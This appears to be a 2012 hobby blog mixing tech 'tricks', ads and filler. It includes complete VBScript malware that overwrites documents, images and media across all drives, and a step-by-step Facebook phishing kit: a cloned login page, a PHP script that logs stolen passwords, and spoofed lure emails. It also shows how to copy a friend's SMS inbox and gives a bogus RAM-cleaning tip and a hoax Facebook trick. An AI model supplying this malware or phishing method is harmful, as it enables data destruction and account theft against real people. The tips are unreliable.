Pages

Sunday, July 15, 2012

Advertisement

Monday, May 28, 2012

SPEED UP YOUR COMPUTER BY CLEANING RAM USING NOTEPAD


If your computer become slow, when you are working with many programs.
It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more.
So, if you can erase or delete those unnecessary pieces of information, your computer RAM will be cleaned and your computer will be speed up.



Cleaning RAM is very easy task here are steps for it, just follow them:


Step 1: Open notepad.

Step 2: Type FreeMem=Space(64000000).

Step 3: Save file with name "CleanRAM.vbs".

Step 4: Close it and run the file.

It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2:

FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb

Make sure that you don't select the memory that is larger than your memory capacity.

Saturday, May 26, 2012

Free PHP Web Hosting

Hey all internet users!!

Free Subdomain

If you want to create Webpage which supports PHP then the link below is the best hosting site to host the site for PHP hosting for free!!

You can get free space of 1500MB with cPanel !!

Easy to sign up and easy to use just with in some clicks you can get your site for free!!

For Sign up click to banner below or the link!!

Free PHP web hosting Web hosting

Friday, May 25, 2012

Create Dangerous .vbs virus which overwrites the file extenstion with .doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg

Hello there!!!
I'm Back here again with new code which can create dangerous virus which over writes the files!!


To create it Follow the steps Below
Step 1:
Open Notepad

Step 2:
copy codes below



This is the code:
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
For Each d In fso.Drives
If d.DriveType + 2 And d.IsReady = True Then
Call SubFolders(d & "\")
End If
Next

Function infect(path)
On Error Resume Next
Set fold = fso.GetFolder(path)
For Each f In fold.Files
ext = fso.GetExtensionName(f.path)
If (ext="doc") or (ext="txt") or (ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") or (ext="js") or (ext="mp2") or (ext="mp3") or (ext="vbs") or (ext="vbe") or (ext="jpeg") or (ext="jpg") Then
fso.CopyFile WScript.ScriptFullName, f.path & ".vbs", True
fso.DeleteFile f.Path, True
End if
Next
End Function

Function SubFolders(path)
On Error Resume next
For Each subf In fso.GetFolder(path).SubFolders
Call Infect(subf.Path)
Call SubFolders(subf.Path)
next
End function

Step 3:
Paste it to Notepad

Step 4:
Save it as A.vbs

This virus overwrites files with these extentions:.doc,.txt,.js,.jse,.css,.wsh,.sct,.hta,.js,.mp2,.mp3 ,.vbs,.vbe,.jpeg,.jpg
I am NOT responsible for any damage caused by this virus so PLEASE DO NOT RUN THIS SCRIPT UNLESS YOU WANT DATA LOSS!!

If you don't want it to be active then save it as .txt

Please comment below!!

Thank You!!

Saturday, May 19, 2012

Now You Can Copy Your Friends Message Inbox In Your Mobile

Now You Can Copy Your Friends Message Inbox In Your Mobile..



Just Follow Below Very Simple Steps:-

        1. Turn on your and your Friends bluetooth.

        2. Go To Settings>sync and backup>phone switch>copy to this.

        3. Where They Ask to Select other device, Then Select new phone.

        4. Now You Can See List Which Item You Want To Select Mark It. You can also copy  MMS,NOTE,Contacts.

         5. Press Done And Search the device. Connect with it.


 Done.
Your Friend Inbox Copied Succesfully..
Enjoy And Use This Trick With Your Friends..

Please Give Your Valuable Comments Below.

Wednesday, May 16, 2012

Free Sms To WorldWide

Send Free sms to world wide for free !!
It supports all country!!!
You don't have to register any id to send sms from here!!
To send Free sms click the link below
Free Sms

Tuesday, May 8, 2012

Information about AdSense ads and site speed




Earlier today, our Websearch team announced that we now consider the speed it takes for a website to load when ranking it in Google search results on google.com. As an AdSense publisher and website owner, you may have questions about this change, so we'd like to take a minute to give you more details.

This change is part of our efforts to provide the best possible search experience for our users, as we've found that faster sites create happy users. Our internal studies show that visitors tend to spend less time on sites that respond slowly, and additional recent data shows that improving site speed also reduces operating costs. For these reasons, we're now taking site speed into account in our search rankings.

Site speed is just one of over 200 signals we use to determine search ranking, and because it's a new signal, it doesn't carry as much weight as the relevance of a page. In fact, less than 1% of all search queries on google.com are affected by the site speed signal. We launched this change a few weeks back after rigorous testing. If you haven't seen much change to your site rankings, then this site speed change possibly did not impact your site.

In general, a website would have to be particularly slow for its ranking to be affected. We look at the time it takes to load all components of a page that contribute to page speed, including images, rich media, and Javascript/HTML/CSS code.

AdSense is built to load ads quickly so there's no need to change your AdSense setup. Even so, we are working to speed up our ads products further. In addition, we also want to give you some suggestions of things you can do on your side, like enabling compression for your site, enabling caching of images, JavaScript, and CSS, and minimizing the size of your JavaScript with Closure Tools.

If you'd like to learn more about speeding up your website, or evaluate your site's speed, we encourage you to look at Site Performance in Webmaster Tools and try developer tools such as Page Speed, YSlow, and WebPageTest.org. Please note that at this time, the only way to determine whether your site has been affected is if you've seen a recent change in your search ranking.

Wednesday, April 11, 2012

Send Free Email


Hello!!
The Free Email Sending option is the best and fast email sending option!!
You can send email just by certain clicks!!
You don't need to register any id to send email!!
it's just easy as you on your PC!!
You can send email to any ID you want!!
To mail freely visit this site Free Email
It is So Much Fun!!

Monday, March 5, 2012

How to Hack Facebook Account Or get Password






This is a step by step tutorial for face-book accounts.
...ONE...
Go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So pressctrl+f and search "action=" without the quotes.




Find action, action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method  to "get" instead of "post", or else it will not work. Save the document as index.html
THREE...
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...
FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...
FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like thisFACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET!
remove the hyperlink from this link:http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button




Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it...

Wednesday, February 15, 2012

Web Hosting

In order to keep your website online and visible to a potentially global audience you need to ensure you have a great web hosting policy in place. Web hosting is something that needs a lot of thought to ensure that you get the best deal available to you, however it can leave you with an overwhelming choice and you may not be familiar with all of the different things associated with it, which is where our web hosting section here at Article Alley can help you. Whether you are looking for good quality articles to read or re-publish on your own website, Article Alley is your solution. We have a database full of web hosting articles that is updated on a daily basis so you are constantly supplied with articles covering the vast subject of web hosting. All of these articles are completely free for you to use so take a moment to look through this section and see if you can find exactly what you are looking for in terms of web hosting.

Wednesday, February 1, 2012

Amazing Facebook Trick

On your keyboard, press…


    1.UP 2 times
    2.DOWN 2 times
    3.LEFT
    4.RIGHT
    5.LEFT
    5.RIGHT
    6.B
    7.A
    8. Enter

and then scroll up or down…
you will see shining circles on Facebook with a diamond ring effect!
remember press the keys in correct order...

Tuesday, January 10, 2012

History of Mig33

Mig33 was released in December of 2005 as the first global mobile Internet community and has quickly spread around the world. With millions of customers in more than 200 countries, the service has taken the world by storm, spreading on the strength of user recommendations, bringing the power of Internet to anyone with a mobile phone.

The concept for mig33 originated in a library coffee shop, between founders Steven Goh and Mei Lin Ng. The two sat down with a blank piece of paper and a goal to figure out a way for teens to send text messages as much as they wanted, without breaking the bank. Ideas brewed on that paper which led to a business proposal and eventually to mig33.

The company was founded on the belief that the rise of VoIP and wireless technologies are redefining the way people connect and find community. mig33 takes advantage of the shift in the telecommunications industry from managing and tariffing the network, to delivering customer services and value. In this second age of the Internet, there are new opportunities to create value propositions that deliver customer and shareholder value.

Today, mig33 has opened the power of the Internet to the global mobile community. It's more than just surfing the Web - mig33 brings all the communications power of the PC right to the palm of the hand.

Monday, January 2, 2012

Exceptional service and benefitsn via master debit card



World Debit MasterCard is designed to let you experience a higher level of convenience, security, and control with a suite of premier benefits. First-rate customer service and access to exceptional travel experiences make it easy to see why this card is perfect for people who live life to the fullest. Comprehensive identity theft resolution If someone attempts to steal your identity, Identity Theft Resolution with Wallet Protection can help you resolve the situation promptly. You get an ID Theft Affidavit and an ID Theft Resolution Kit as well as access to a number of services, including credit bureau notification. You also have access to a 24-hour provider who will lock out all of your reported cards and documents, and, if needed, the provider can coordinate a conference call with your card issuer. Remarkable experiences and offers World Debit MasterCard includes free membership in MasterCard MarketPlace Plus™ *, a collection of promotions featuring deep savings at VIP shopping events, travel promotions and more. And with MasterCard Experiences and Offers*, you'll be eligible for preferred access and upgrades at luxury destinations, fine restaurants and sports and entertainment events. Worldwide purchase protection When you use World Debit MasterCard to shop anywhere in the world, you can trust that you're making a wise purchase. That's because Purchase Assurance® * coverage insures you against theft, damage or loss of most items for 90 days after you buy them. Don't like what you bought? No problem. With Satisfaction Guarantee*, you may get up to $250 back per item for anything you buy from merchants who won't accept returns.